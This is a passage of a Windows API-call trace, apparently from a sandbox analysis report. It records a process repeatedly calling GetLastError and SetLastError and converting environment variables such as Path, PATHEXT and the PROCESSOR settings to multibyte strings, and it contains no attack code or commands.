returned 0x0 [0102.662] SetLastError (dwErrCode=0x0) [0102.662] GetLastError () returned 0x0 [0102.662] SetLastError (dwErrCode=0x0) [0102.662] GetLastError () returned 0x0 [0102.662] SetLastError (dwErrCode=0x0) [0102.662] GetLastError () returned 0x0 [0102.662] SetLastError (dwErrCode=0x0) [0102.663] GetLastError () returned 0x0 [0102.663] SetLastError (dwErrCode=0x0) [0102.663] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c16f0) returned 0x28 [0102.663] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c16f0, Size=0x2c) returned 0x2c16f0 [0102.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\kEecfMwgj\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0102.663] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x2e) returned 0x2bb498 [0102.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\kEecfMwgj\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x2bb498, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\kEecfMwgj\\AppData\\Local", lpUsedDefaultChar=0x0) returned 46 [0102.663] GetLastError () returned 0x0 [0102.663] SetLastError (dwErrCode=0x0) [0102.663] GetLastError () returned 0x0 [0102.663] SetLastError (dwErrCode=0x0) [0102.663] GetLastError () returned 0x0 [0102.663] SetLastError (dwErrCode=0x0) [0102.663] GetLastError () returned 0x0 [0102.663] SetLastError (dwErrCode=0x0) [0102.663] GetLastError () returned 0x0 [0102.663] SetLastError (dwErrCode=0x0) [0102.663] GetLastError () returned 0x0 [0102.663] SetLastError (dwErrCode=0x0) [0102.663] GetLastError () returned 0x0 [0102.663] SetLastError (dwErrCode=0x0) [0102.663] GetLastError () returned 0x0 [0102.664] SetLastError (dwErrCode=0x0) [0102.664] GetLastError () returned 0x0 [0102.664] SetLastError (dwErrCode=0x0) [0102.664] GetLastError () returned 0x0 [0102.664] SetLastError (dwErrCode=0x0) [0102.664] GetLastError () returned 0x0 [0102.664] SetLastError (dwErrCode=0x0) [0102.664] GetLastError () returned 0x0 [0102.664] SetLastError (dwErrCode=0x0) [0102.664] GetLastError () returned 0x0 [0102.664] SetLastError (dwErrCode=0x0) [0102.664] GetLastError () returned 0x0 [0102.664] SetLastError (dwErrCode=0x0) [0102.664] GetLastError () returned 0x0 [0102.664] SetLastError (dwErrCode=0x0) [0102.664] GetLastError () returned 0x0 [0102.664] SetLastError (dwErrCode=0x0) [0102.664] GetLastError () returned 0x0 [0102.664] SetLastError (dwErrCode=0x0) [0102.664] GetLastError () returned 0x0 [0102.664] SetLastError (dwErrCode=0x0) [0102.664] GetLastError () returned 0x0 [0102.665] SetLastError (dwErrCode=0x0) [0102.665] GetLastError () returned 0x0 [0102.665] SetLastError (dwErrCode=0x0) [0102.665] GetLastError () returned 0x0 [0102.665] SetLastError (dwErrCode=0x0) [0102.665] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c16f0) returned 0x2c [0102.665] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c16f0, Size=0x30) returned 0x2c16f0 [0102.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0102.665] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x19) returned 0x2beba8 [0102.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x2beba8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\Q9IATRKPRH", lpUsedDefaultChar=0x0) returned 25 [0102.665] GetLastError () returned 0x0 [0102.665] SetLastError (dwErrCode=0x0) [0102.665] GetLastError () returned 0x0 [0102.665] SetLastError (dwErrCode=0x0) [0102.665] GetLastError () returned 0x0 [0102.665] SetLastError (dwErrCode=0x0) [0102.665] GetLastError () returned 0x0 [0102.665] SetLastError (dwErrCode=0x0) [0102.665] GetLastError () returned 0x0 [0102.665] SetLastError (dwErrCode=0x0) [0102.665] GetLastError () returned 0x0 [0102.665] SetLastError (dwErrCode=0x0) [0102.665] GetLastError () returned 0x0 [0102.665] SetLastError (dwErrCode=0x0) [0102.665] GetLastError () returned 0x0 [0102.666] SetLastError (dwErrCode=0x0) [0102.666] GetLastError () returned 0x0 [0102.666] SetLastError (dwErrCode=0x0) [0102.666] GetLastError () returned 0x0 [0102.666] SetLastError (dwErrCode=0x0) [0102.666] GetLastError () returned 0x0 [0102.666] SetLastError (dwErrCode=0x0) [0102.666] GetLastError () returned 0x0 [0102.666] SetLastError (dwErrCode=0x0) [0102.666] GetLastError () returned 0x0 [0102.666] SetLastError (dwErrCode=0x0) [0102.666] GetLastError () returned 0x0 [0102.666] SetLastError (dwErrCode=0x0) [0102.666] GetLastError () returned 0x0 [0102.666] SetLastError (dwErrCode=0x0) [0102.666] GetLastError () returned 0x0 [0102.666] SetLastError (dwErrCode=0x0) [0102.666] GetLastError () returned 0x0 [0102.666] SetLastError (dwErrCode=0x0) [0102.666] GetLastError () returned 0x0 [0102.666] SetLastError (dwErrCode=0x0) [0102.666] GetLastError () returned 0x0 [0102.666] SetLastError (dwErrCode=0x0) [0102.667] GetLastError () returned 0x0 [0102.667] SetLastError (dwErrCode=0x0) [0102.667] GetLastError () returned 0x0 [0102.667] SetLastError (dwErrCode=0x0) [0102.667] GetLastError () returned 0x0 [0102.667] SetLastError (dwErrCode=0x0) [0102.667] GetLastError () returned 0x0 [0102.667] SetLastError (dwErrCode=0x0) [0102.667] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c16f0) returned 0x30 [0102.667] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c16f0, Size=0x34) returned 0x2c16f0 [0102.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0102.667] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x17) returned 0x2c1730 [0102.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x2c1730, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0102.667] GetLastError () returned 0x0 [0102.667] SetLastError (dwErrCode=0x0) [0102.667] GetLastError () returned 0x0 [0102.667] SetLastError (dwErrCode=0x0) [0102.667] GetLastError () returned 0x0 [0102.667] SetLastError (dwErrCode=0x0) [0102.667] GetLastError () returned 0x0 [0102.667] SetLastError (dwErrCode=0x0) [0102.667] GetLastError () returned 0x0 [0102.668] SetLastError (dwErrCode=0x0) [0102.668] GetLastError () returned 0x0 [0102.668] SetLastError (dwErrCode=0x0) [0102.668] GetLastError () returned 0x0 [0102.668] SetLastError (dwErrCode=0x0) [0102.668] GetLastError () returned 0x0 [0102.668] SetLastError (dwErrCode=0x0) [0102.668] GetLastError () returned 0x0 [0102.668] SetLastError (dwErrCode=0x0) [0102.668] GetLastError () returned 0x0 [0102.668] SetLastError (dwErrCode=0x0) [0102.668] GetLastError () returned 0x0 [0102.668] SetLastError (dwErrCode=0x0) [0102.668] GetLastError () returned 0x0 [0102.668] SetLastError (dwErrCode=0x0) [0102.668] GetLastError () returned 0x0 [0102.668] SetLastError (dwErrCode=0x0) [0102.668] GetLastError () returned 0x0 [0102.668] SetLastError (dwErrCode=0x0) [0102.668] GetLastError () returned 0x0 [0102.668] SetLastError (dwErrCode=0x0) [0102.668] GetLastError () returned 0x0 [0102.669] SetLastError (dwErrCode=0x0) [0102.669] GetLastError () returned 0x0 [0102.669] SetLastError (dwErrCode=0x0) [0102.669] GetLastError () returned 0x0 [0102.669] SetLastError (dwErrCode=0x0) [0102.669] GetLastError () returned 0x0 [0102.669] SetLastError (dwErrCode=0x0) [0102.669] GetLastError () returned 0x0 [0102.669] SetLastError (dwErrCode=0x0) [0102.669] GetLastError () returned 0x0 [0102.669] SetLastError (dwErrCode=0x0) [0102.669] GetLastError () returned 0x0 [0102.669] SetLastError (dwErrCode=0x0) [0102.669] GetLastError () returned 0x0 [0102.669] SetLastError (dwErrCode=0x0) [0102.669] GetLastError () returned 0x0 [0102.669] SetLastError (dwErrCode=0x0) [0102.669] GetLastError () returned 0x0 [0102.669] SetLastError (dwErrCode=0x0) [0102.669] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c16f0) returned 0x34 [0102.669] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c16f0, Size=0x38) returned 0x2c16f0 [0102.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0102.669] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0xe) returned 0x2b3238 [0102.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x2b3238, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0102.670] GetLastError () returned 0x0 [0102.670] SetLastError (dwErrCode=0x0) [0102.670] GetLastError () returned 0x0 [0102.670] SetLastError (dwErrCode=0x0) [0102.670] GetLastError () returned 0x0 [0102.670] SetLastError (dwErrCode=0x0) [0102.670] GetLastError () returned 0x0 [0102.670] SetLastError (dwErrCode=0x0) [0102.670] GetLastError () returned 0x0 [0102.670] SetLastError (dwErrCode=0x0) [0102.670] GetLastError () returned 0x0 [0102.670] SetLastError (dwErrCode=0x0) [0102.670] GetLastError () returned 0x0 [0102.670] SetLastError (dwErrCode=0x0) [0102.670] GetLastError () returned 0x0 [0102.670] SetLastError (dwErrCode=0x0) [0102.670] GetLastError () returned 0x0 [0102.670] SetLastError (dwErrCode=0x0) [0102.670] GetLastError () returned 0x0 [0102.670] SetLastError (dwErrCode=0x0) [0102.670] GetLastError () returned 0x0 [0102.671] SetLastError (dwErrCode=0x0) [0102.671] GetLastError () returned 0x0 [0102.671] SetLastError (dwErrCode=0x0) [0102.671] GetLastError () returned 0x0 [0102.671] SetLastError (dwErrCode=0x0) [0102.671] GetLastError () returned 0x0 [0102.671] SetLastError (dwErrCode=0x0) [0102.671] GetLastError () returned 0x0 [0102.671] SetLastError (dwErrCode=0x0) [0102.671] GetLastError () returned 0x0 [0102.671] SetLastError (dwErrCode=0x0) [0102.671] GetLastError () returned 0x0 [0102.671] SetLastError (dwErrCode=0x0) [0102.671] GetLastError () returned 0x0 [0102.671] SetLastError (dwErrCode=0x0) [0102.671] GetLastError () returned 0x0 [0102.671] SetLastError (dwErrCode=0x0) [0102.672] GetLastError () returned 0x0 [0102.672] SetLastError (dwErrCode=0x0) [0102.672] GetLastError () returned 0x0 [0102.672] SetLastError (dwErrCode=0x0) [0102.672] GetLastError () returned 0x0 [0102.672] SetLastError (dwErrCode=0x0) [0102.672] GetLastError () returned 0x0 [0102.672] SetLastError (dwErrCode=0x0) [0102.672] GetLastError () returned 0x0 [0102.672] SetLastError (dwErrCode=0x0) [0102.672] GetLastError () returned 0x0 [0102.672] SetLastError (dwErrCode=0x0) [0102.672] GetLastError () returned 0x0 [0102.672] SetLastError (dwErrCode=0x0) [0102.672] GetLastError () returned 0x0 [0102.672] SetLastError (dwErrCode=0x0) [0102.672] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c16f0) returned 0x38 [0102.672] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c16f0, Size=0x3c) returned 0x2c1750 [0102.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 149 [0102.672] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x95) returned 0x2c1798 [0102.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x2c1798, cbMultiByte=149, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 149 [0102.672] GetLastError () returned 0x0 [0102.672] SetLastError (dwErrCode=0x0) [0102.673] GetLastError () returned 0x0 [0102.673] SetLastError (dwErrCode=0x0) [0102.673] GetLastError () returned 0x0 [0102.673] SetLastError (dwErrCode=0x0) [0102.673] GetLastError () returned 0x0 [0102.673] SetLastError (dwErrCode=0x0) [0102.673] GetLastError () returned 0x0 [0102.673] SetLastError (dwErrCode=0x0) [0102.673] GetLastError () returned 0x0 [0102.673] SetLastError (dwErrCode=0x0) [0102.673] GetLastError () returned 0x0 [0102.673] SetLastError (dwErrCode=0x0) [0102.673] GetLastError () returned 0x0 [0102.673] SetLastError (dwErrCode=0x0) [0102.673] GetLastError () returned 0x0 [0102.673] SetLastError (dwErrCode=0x0) [0102.673] GetLastError () returned 0x0 [0102.673] SetLastError (dwErrCode=0x0) [0102.673] GetLastError () returned 0x0 [0102.673] SetLastError (dwErrCode=0x0) [0102.673] GetLastError () returned 0x0 [0102.674] SetLastError (dwErrCode=0x0) [0102.674] GetLastError () returned 0x0 [0102.674] SetLastError (dwErrCode=0x0) [0102.674] GetLastError () returned 0x0 [0102.674] SetLastError (dwErrCode=0x0) [0102.674] GetLastError () returned 0x0 [0102.674] SetLastError (dwErrCode=0x0) [0102.674] GetLastError () returned 0x0 [0102.674] SetLastError (dwErrCode=0x0) [0102.674] GetLastError () returned 0x0 [0102.674] SetLastError (dwErrCode=0x0) [0102.674] GetLastError () returned 0x0 [0102.674] SetLastError (dwErrCode=0x0) [0102.674] GetLastError () returned 0x0 [0102.674] SetLastError (dwErrCode=0x0) [0102.674] GetLastError () returned 0x0 [0102.674] SetLastError (dwErrCode=0x0) [0102.674] GetLastError () returned 0x0 [0102.674] SetLastError (dwErrCode=0x0) [0102.674] GetLastError () returned 0x0 [0102.674] SetLastError (dwErrCode=0x0) [0102.674] GetLastError () returned 0x0 [0102.675] SetLastError (dwErrCode=0x0) [0102.675] GetLastError () returned 0x0 [0102.675] SetLastError (dwErrCode=0x0) [0102.675] GetLastError () returned 0x0 [0102.675] SetLastError (dwErrCode=0x0) [0102.675] GetLastError () returned 0x0 [0102.675] SetLastError (dwErrCode=0x0) [0102.675] GetLastError () returned 0x0 [0102.675] SetLastError (dwErrCode=0x0) [0102.675] GetLastError () returned 0x0 [0102.675] SetLastError (dwErrCode=0x0) [0102.675] GetLastError () returned 0x0 [0102.675] SetLastError (dwErrCode=0x0) [0102.675] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c1750) returned 0x3c [0102.675] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c1750, Size=0x40) returned 0x2c1750 [0102.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0102.675] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x3e) returned 0x2b25b0 [0102.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x2b25b0, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0102.675] GetLastError () returned 0x0 [0102.675] SetLastError (dwErrCode=0x0) [0102.675] GetLastError () returned 0x0 [0102.675] SetLastError (dwErrCode=0x0) [0102.676] GetLastError () returned 0x0 [0102.676] SetLastError (dwErrCode=0x0) [0102.676] GetLastError () returned 0x0 [0102.676] SetLastError (dwErrCode=0x0) [0102.676] GetLastError () returned 0x0 [0102.676] SetLastError (dwErrCode=0x0) [0102.676] GetLastError () returned 0x0 [0102.676] SetLastError (dwErrCode=0x0) [0102.676] GetLastError () returned 0x0 [0102.676] SetLastError (dwErrCode=0x0) [0102.676] GetLastError () returned 0x0 [0102.676] SetLastError (dwErrCode=0x0) [0102.676] GetLastError () returned 0x0 [0102.676] SetLastError (dwErrCode=0x0) [0102.676] GetLastError () returned 0x0 [0102.676] SetLastError (dwErrCode=0x0) [0102.676] GetLastError () returned 0x0 [0102.676] SetLastError (dwErrCode=0x0) [0102.676] GetLastError () returned 0x0 [0102.676] SetLastError (dwErrCode=0x0) [0102.676] GetLastError () returned 0x0 [0102.676] SetLastError (dwErrCode=0x0) [0102.676] GetLastError () returned 0x0 [0102.677] SetLastError (dwErrCode=0x0) [0102.677] GetLastError () returned 0x0 [0102.677] SetLastError (dwErrCode=0x0) [0102.677] GetLastError () returned 0x0 [0102.677] SetLastError (dwErrCode=0x0) [0102.677] GetLastError () returned 0x0 [0102.677] SetLastError (dwErrCode=0x0) [0102.677] GetLastError () returned 0x0 [0102.677] SetLastError (dwErrCode=0x0) [0102.677] GetLastError () returned 0x0 [0102.677] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c1750) returned 0x40 [0102.677] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c1750, Size=0x44) returned 0x2c1838 [0102.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0102.677] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x1b) returned 0x2bebd0 [0102.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x2bebd0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0102.677] GetLastError () returned 0x0 [0102.677] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c1838) returned 0x44 [0102.677] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c1838, Size=0x48) returned 0x2c1838 [0102.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0102.677] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x1d) returned 0x2bebf8 [0102.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x2bebf8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0102.677] GetLastError () returned 0x0 [0102.677] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c1838) returned 0x48 [0102.678] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c1838, Size=0x4c) returned 0x2c1838 [0102.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0102.678] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x48) returned 0x2b6e90 [0102.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x2b6e90, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0102.678] GetLastError () returned 0x0 [0102.678] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c1838) returned 0x4c [0102.678] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c1838, Size=0x50) returned 0x2c1838 [0102.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0102.678] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x12) returned 0x2c16f0 [0102.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x2c16f0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0102.678] GetLastError () returned 0x0 [0102.678] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c1838) returned 0x50 [0102.678] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c1838, Size=0x54) returned 0x2c1838 [0102.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0102.678] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x18) returned 0x2c1710 [0102.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x2c1710, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0102.678] GetLastError () returned 0x0 [0102.678] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c1838) returned 0x54 [0102.678] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c1838, Size=0x58) returned 0x2c1838 [0102.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0102.678] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x1b) returned 0x2bec20 [0102.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x2bec20, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0102.679] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c1838) returned 0x58 [0102.679] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c1838, Size=0x5c) returned 0x2c1838 [0102.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0102.679] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x24) returned 0x2badc0 [0102.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x2badc0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0102.679] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c1838) returned 0x5c [0102.679] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c1838, Size=0x60) returned 0x2c1838 [0102.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0102.679] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x29) returned 0x2bb4d0 [0102.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x2bb4d0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0102.679] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c1838) returned 0x60 [0102.679] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c1838, Size=0x64) returned 0x2c1838 [0102.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0102.679] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x1e) returned 0x2bec48 [0102.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x2bec48, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0102.679] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c1838) returned 0x64 [0102.679] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c1838, Size=0x68) returned 